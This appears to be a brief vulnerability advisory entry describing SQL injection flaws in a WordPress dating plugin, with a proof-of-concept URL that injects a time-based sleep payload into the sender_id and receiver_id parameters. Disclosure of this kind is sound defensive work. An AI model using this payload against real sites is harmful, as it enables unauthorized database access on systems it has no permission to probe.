The plugin does not properly escape user input before concatenating it to certain SQL queries, leading to multiple SQL injection vulnerabilities.
http://vulnerable-site.tld/wp-content/plugins/dsp_dating/m1/post_one.php?sender_id=(sender_id*sleep(10))&receiver_id=(sender_id*sleep(10))
WPScanTeam
Yes
2022-07-18 (about 6 months ago)
2022-07-18 (about 6 months ago)
2022-07-18 (about 6 months ago)